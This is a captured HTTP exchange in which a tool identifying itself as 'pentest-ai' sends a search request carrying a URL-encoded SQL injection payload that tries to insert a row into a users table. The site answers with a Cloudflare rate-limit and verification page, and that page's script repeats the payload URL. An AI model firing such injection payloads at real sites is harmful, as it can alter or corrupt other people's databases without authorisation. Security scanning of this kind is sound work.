REQUEST:
GET https://my.myfirst.tech/search?username=1%27%3B%20INSERT%20INTO%20users%20VALUES%28%27x%27%2C%27y%27%29--
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:18 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9449
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c8475b5f2da110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=MOXksQnbvSbJKmqZy4A0%2B8zW5oYsK2NgxZ5RcZVWWNkcv9zUcFzUVWIQNUTPy%2BZ16dc6Amxozf5BOm%2BXN5wr%2BR1c8vr7123rW8U2%2F%2B0rzFhOKPO7g%2Ffr8VgF7PFmTdueDg%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c8475b5f2da110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'DAO3dNBqTSOTczw9D9CNsLmhIK_7A9dR.j.O6LH2reQ-1784281158-1.2.1.1-bYryKMMPlGqIg0CqS8VHdv3Klz6U_A_28qLNf_uCUI1q2IGzZ9JR1tv6_PL4Yiac',cITimeS: '1784281158',cRay: 'a1c8475b5f2da110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?username=1%27%3B+INSERT+INTO+users+VALUES%28%27x%27%2C%27y%27%29--\u0026__cf_chl_tk=w8C3Sljoq5LBACPZif6kA1dpX0SEzV8ISypOH9fBQjs-1784281158-1.0.1.1-Fxb5bZTjVFHmPN82X967C5gY_j.IvtPTtLDNf2spJsU",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?username=1%27%3B+INSERT+INTO+users+VALUES%28%27x%27%2C%27y%27%29--\u0026__cf_chl_f_tk=w8C3Sljoq5LBACPZif6kA1dpX0SEzV8ISypOH9fBQjs-1784281158-1.0.1.1-Fxb5bZTjVFHmPN82X967C5gY_j.IvtPTtLDNf2spJsU",md: 'Vc6iBzqlW7TduS7i2R18ZxEHLeQGF5FeJ8Lo5KK.hDI-1784281158-1.2.1.1-iifLpAlH47gp1w.3iC9DliPJ.3BROGm0quqeC02HTbowB17qboQOuEzN3DVJQj2RmM4DCLAcPMhW2d0T0N25PQ6B0jINtthJpeP7D5RJhHayZOIODColC9_BPFdRI9PJxDugdKtbhyv8PqM5NNHxZs4.3jy0LXEg1LItvYbZRKqdxmh0y4vwBQgP3_SvVRYbtc50nydbKwm51y8YcVsiWDAMJtitx61P18bZj1xkknLaS9OWCRja_XPGmfF4akEZ20Per6ACRDVxScddtAl01m7Nb_N0XC.kgc6UiKwqr5gCzDwBUCCktAIdRKzGrDJU7v9UIf.noRmuarkH5_3z8mkAGjWbWpmHSyVF29lke31BqC.vtH2aJOjRWnF074qcDO4Tsk03XazQEclEFLl.VPd7NOPvayKSPwQS9bbPbu7UBR2CxPefkOi0TD.fRjU6r0TyFgTTIqXTg4oKTYU2Y3XYlmqblzh5LiCk2oOm7cmyYBZ5l2JYmMODMifwTc.z.hOfKV586t44CWOtz0VdLgQPn50SLiF9Uia8NLxWX6509YbpHPVTaXkvuhBpvUVlI5b.dPfQ7u9y5MRBSsdDv.KEuCCqDyovFr7SJUUQ8NhPvYBhpYjCfOtHOOUctnNnA4nndSob8cWMxB4S6OB20lQjBDpZw1k1RrkT1Q._uababQvIOt0gH9DW_25PnPuuZsOEJ5yrKHsTlBtJs2D8zZSgGSKzQNeKDWyzmV6sCPlp1rayDiFBb_LTtXzm.LHJdmXbla58.Yc1vWjKtrIkf49IVScChvW1HJY9.J4MWw5znx6tw.EGz9mHjBk4KhMIeq3tKDE5Q06EuOK4_H9he_yBxifDe02PMhM.9g3y4hi7BFsl35.Ttx_VD8M0bNC3COujtLzbBXd.t0JkX7swUZ6M4wWZrq7GsbZmaG3iF3AEsIdfl7e.TcfB4S5S.CTxChMkQrQe_jahNfNyLVkYaBdHAYRFjlvdwLUXML5uaTrmhN2ujuvIqif7mgIN5VdAZWfBUZh9ItwAmII4mic2wXk8Wf7UmA1udARQKJNFhoL3JV5T6AUFJqBO8ruz.2D1E3QltKyt7jbC6TIgwN.J0vYImRVKboSHBq3qqOWbgxs7Aq8h2b79d7o6RgvTV1Gadb_ZblcKoFzA9w1jcHHpkzrARydjKehnuqBIqTnTjorhJeBjWKIHq.i0sbIpy1bJ',mdrd: 'YGLgF8r6WZdE4Z4FUrD5vBtEFTM4owoIE17bjtsEeG8-1784281158-1.2.1.1-3GFGskrDkDw_1DFWRMH3VXZFhdG0xdX5iDRzzZr_ccUEl92vu8XHzhviaQ2.MSLeUldoqG_KUYtxWt2T96guHGmgufqOQKLIuw4uHiRGU4BhMmPg6rnd9aiBRvz.7Hs1ozC9l1CzBAbVwbg_d4rLTRk8y76K1TSajtHVZbxcDEJYwKm3H34Tw8lku48W251qJRcOKZZwutI4f2_oK49x4QFwUVO29T_a1NsNb92bZUzqBCi_KRHhhl4ZoK8d6JUf',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c8475b5f2da110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?username=1%27%3B+INSERT+INTO+users+VALUES%28%27x%27%2C%27y%27%29--\u0026__cf_chl_rt_tk=w8C3Sljoq5LBACPZif6kA1dpX0SEzV8ISypOH9fBQjs-1784281158-1.0.1.1-Fxb5bZTjVFHmPN82X967C5gY_j.IvtPTtLDNf2spJsU"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
